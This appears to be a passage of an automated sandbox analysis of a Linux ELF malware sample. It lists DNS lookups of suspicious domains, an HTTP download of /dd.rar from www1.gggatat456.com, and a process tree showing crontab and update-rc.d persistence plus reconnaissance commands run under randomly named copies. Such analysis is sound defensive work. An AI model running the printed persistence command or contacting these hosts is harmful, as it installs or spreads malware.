                                                                                                                                                                                    Oct 26, 2023 20:31:03.195225000 CEST8.8.8.8192.168.2.230x3214No error (0)p5.lpjulidny7.com34.98.99.30A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.297816992 CEST8.8.8.8192.168.2.230x90eaName error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.403337002 CEST8.8.4.4192.168.2.230x11b1Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.505925894 CEST8.8.8.8192.168.2.230x829cNo error (0)ppp.xxxatat456.com142.0.138.44A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.505925894 CEST8.8.8.8192.168.2.230x829cNo error (0)ppp.xxxatat456.com142.4.106.73A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.505925894 CEST8.8.8.8192.168.2.230x829cNo error (0)ppp.xxxatat456.com192.74.236.33A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.505925894 CEST8.8.8.8192.168.2.230x829cNo error (0)ppp.xxxatat456.com142.0.138.42A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.505925894 CEST8.8.8.8192.168.2.230x829cNo error (0)ppp.xxxatat456.com142.4.106.75A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.505925894 CEST8.8.8.8192.168.2.230x829cNo error (0)ppp.xxxatat456.com192.74.236.35A (IP address)IN (0x0001)false
                                                                                                                                                                                    • www1.gggatat456.com
                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    0192.168.2.2343268142.0.138.4180
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Oct 26, 2023 20:30:47.799531937 CEST0OUTGET /dd.rar HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Language: zh-cn
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
                                                                                                                                                                                    Host: www1.gggatat456.com
                                                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:/tmp/1.elf
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/sbin/update-rc.d
                                                                                                                                                                                    Arguments:update-rc.d 1.elf defaults
                                                                                                                                                                                    File size:3478464 bytes
                                                                                                                                                                                    MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/sbin/update-rc.d
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:3478464 bytes
                                                                                                                                                                                    MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/bin/systemctl
                                                                                                                                                                                    Arguments:systemctl daemon-reload
                                                                                                                                                                                    File size:996584 bytes
                                                                                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/bin/sh
                                                                                                                                                                                    Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
                                                                                                                                                                                    File size:129816 bytes
                                                                                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/bin/sh
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:129816 bytes
                                                                                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                                                                                    Start time (UTC):18:30:46
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/bin/sed
                                                                                                                                                                                    Arguments:sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
                                                                                                                                                                                    File size:121288 bytes
                                                                                                                                                                                    MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:/usr/bin/ccxfvtbhgr su 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:/usr/bin/ccxfvtbhgr "netstat -antop" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:/usr/bin/ccxfvtbhgr whoami 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:/usr/bin/ccxfvtbhgr ifconfig 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:52
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:51
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:/usr/bin/ccxfvtbhgr "netstat -antop" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:52
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ccxfvtbhgr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:6a5eca188339a325e9ac1189dbb89376

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:/usr/bin/ezztyrfjzf "cat resolv.conf" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:/usr/bin/ezztyrfjzf ifconfig 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:/usr/bin/ezztyrfjzf ls 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:/usr/bin/ezztyrfjzf "ps -ef" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:30:57
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:/usr/bin/ezztyrfjzf "netstat -antop" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:30:58
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ezztyrfjzf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:9e1504dcb6964dbc17834520c7a967c0

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:/usr/bin/dyuvutukki "echo \"find\"" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:/usr/bin/dyuvutukki "cat resolv.conf" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:/usr/bin/dyuvutukki "ifconfig eth0" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:/usr/bin/dyuvutukki id 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:/usr/bin/dyuvutukki uptime 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:03
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/dyuvutukki
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:0aca8cf23a8c3e87b13a9c7043110017

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:/usr/bin/vapcvdizxx "route -n" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:/usr/bin/vapcvdizxx top 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
